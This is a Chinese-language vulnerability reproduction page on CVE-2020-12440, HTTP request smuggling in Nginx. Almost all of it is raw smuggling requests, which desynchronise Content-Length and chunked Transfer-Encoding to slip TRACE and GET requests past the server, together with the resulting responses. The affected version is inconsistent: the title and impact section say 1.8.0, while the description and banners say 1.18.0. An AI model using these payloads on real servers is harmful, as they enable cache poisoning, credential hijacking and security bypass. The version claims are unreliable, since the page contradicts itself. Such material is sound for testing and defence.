(CVE-2020-12440)Nginx \<= 1.8.0 请求走私
==========================================
一、漏洞简介
------------
Nginx
1.18.0及之前版本中存在安全漏洞。攻击者可利用该漏洞进行缓存投毒,劫持凭证或绕过安全保护。
二、漏洞影响
------------
Nginx \<= 1.8.0
三、复现过程
------------
Nginx<=1.8.0请求走私/media/rId24.jpg)
### Request
GET /test.html HTTP/1.1
Host: www.0-sec.org
Content-Length: 2
GET /poc.html HTTP/1.1
Host: www.0-sec.org
Content-Length: 15
### Response
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 01 May 2020 18:28:44 GMT
Content-Type: text/html
Content-Length: 33
Last-Modified: Thu, 30 Apr 2020 14:36:32 GMT
Connection: keep-alive
ETag: "5eaae270-21"
Accept-Ranges: bytes
Test Page!
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 01 May 2020 18:28:44 GMT
Content-Type: text/html
Content-Length: 15
Last-Modified: Thu, 30 Apr 2020 14:35:41 GMT
Connection: keep-alive
ETag: "5eaae23d-f"
Accept-Ranges: bytes
NGINX PoC File
其他例子
--------
### Request(200 OK + 405 Method Not Allowed)
GET / HTTP/1.1
Host: www.0-sec.org
Content-Length: 4
Transfer-Encoding : chunked
46
TRACE / HTTP/1.1
Host:www.0-sec.org
Content-Length:15
kk
0s
### Response(200 OK + 405 Method Not Allowed)
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:28:12 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Tue, 21 Apr 2020 16:08:59 GMT
Connection: keep-alive
ETag: "5e9f1a9b-264"
Accept-Ranges: bytes
Welcome to nginx!
Welcome to nginx!
If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.
For online documentation and support please refer to
nginx.org.
Commercial support is available at
nginx.com.
Thank you for using nginx.
HTTP/1.1 405 Not Allowed
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:28:12 GMT
Content-Type: text/html
Content-Length: 157
Connection: close
405 Not Allowed
405 Not Allowed
nginx/1.18.0
### Request(200 OK + 404 Not Found)
GET / HTTP/1.1
Host: www.0-sec.org
Content-Length: 4
Transfer-Encoding : chunked
46
GET /404 HTTP/1.1
Host:www.0-sec.org
Content-Length:15
kk
0s
### Response(200 OK + 404 Not Found)
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:23:52 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Tue, 21 Apr 2020 16:08:59 GMT
Connection: keep-alive
ETag: "5e9f1a9b-264"
Accept-Ranges: bytes
Welcome to nginx!
Welcome to nginx!
If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.
For online documentation and support please refer to
nginx.org.
Commercial support is available at
nginx.com.
Thank you for using nginx.
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:23:52 GMT
Content-Type: text/html
Content-Length: 153
Connection: keep-alive
404 Not Found
404 Not Found
nginx/1.18.0